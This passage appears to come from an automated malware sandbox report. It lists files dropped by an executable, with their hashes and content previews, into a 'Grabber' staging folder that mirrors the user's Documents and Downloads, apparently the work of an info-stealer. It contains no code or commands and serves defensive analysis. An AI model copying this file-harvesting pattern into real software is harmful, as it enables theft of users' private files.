Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP\EWZCVGNOWT.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6957997909429325
Encrypted:	false
SSDEEP:	24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
MD5:	4F49714E789620AEDB7B9565DC949466
SHA1:	5917AC09E3D5074BFF8E1289865CAFF6403D1E82
SHA-256:	A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
SHA-512:	61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
Malicious:	false
Preview:	NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP\ZGGKNSUKOP.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EIVQSAOTAQ.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EWZCVGNOWT.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

